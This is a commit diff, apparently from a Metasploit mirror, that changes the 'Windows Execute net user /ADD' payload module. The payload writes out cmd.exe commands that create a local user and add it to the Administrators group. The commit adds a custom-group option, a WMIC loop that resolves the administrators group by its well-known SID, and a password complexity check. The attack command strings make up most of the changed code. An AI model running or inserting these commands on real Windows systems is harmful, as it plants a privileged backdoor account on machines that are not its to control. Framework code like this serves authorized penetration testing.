Added WMIC and complexity checks
Chris John Riley
parent
bada88cdf0
commit
ea66deb779
|
|
@ -28,7 +28,7 @@ module Metasploit3
|
||||||
'Name' => 'Windows Execute net user /ADD',
|
'Name' => 'Windows Execute net user /ADD',
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'Description' => 'Create a new user and add them to local administration group',
|
'Description' => 'Create a new user and add them to local administration group',
|
||||||
'Author' => 'hdm',
|
'Author' => ['hdm','Chris John Riley'],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
|
|
@ -39,6 +39,13 @@ module Metasploit3
|
||||||
[
|
[
|
||||||
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
|
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
|
||||||
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
|
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
|
||||||
|
OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
|
||||||
|
OptBool.new('WMIC', [ true, "Use WMIC on the target to resolve administrators group", false ]),
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
# Hide the CMD option...this is kinda ugly
|
# Hide the CMD option...this is kinda ugly
|
||||||
|
|
@ -51,13 +58,36 @@ module Metasploit3
|
||||||
def command_string
|
def command_string
|
||||||
user = datastore['USER'] || 'metasploit'
|
user = datastore['USER'] || 'metasploit'
|
||||||
pass = datastore['PASS'] || ''
|
pass = datastore['PASS'] || ''
|
||||||
|
cust = datastore['CUSTOM'] || ''
|
||||||
|
wmic = datastore['WMIC']
|
||||||
|
complexity= datastore['COMPLEXITY']
|
||||||
|
|
||||||
if(pass.length > 14)
|
if(pass.length > 14)
|
||||||
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
|
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
|
||||||
end
|
end
|
||||||
|
|
||||||
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
|
if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
|
||||||
"net localgroup Administrators #{user} /ADD"
|
print_good "Password: #{pass} passes complexity checks"
|
||||||
end
|
elsif complexity
|
||||||
|
print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
|
||||||
|
end
|
||||||
|
|
||||||
|
if not cust.empty?
|
||||||
|
print_status("Using custom group name #{cust}")
|
||||||
|
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
|
||||||
|
"net localgroup \"#{cust}\" #{user} /ADD"
|
||||||
|
elsif wmic
|
||||||
|
print_status("Using WMIC to discover the administrative group name")
|
||||||
|
return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
|
||||||
|
"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
|
||||||
|
"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
|
||||||
|
"net user #{user} #{pass} /ADD && " +
|
||||||
|
"net localgroup \"%X\" #{user} /ADD\""
|
||||||
|
else
|
||||||
|
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
|
||||||
|
"net localgroup Administrators #{user} /ADD"
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue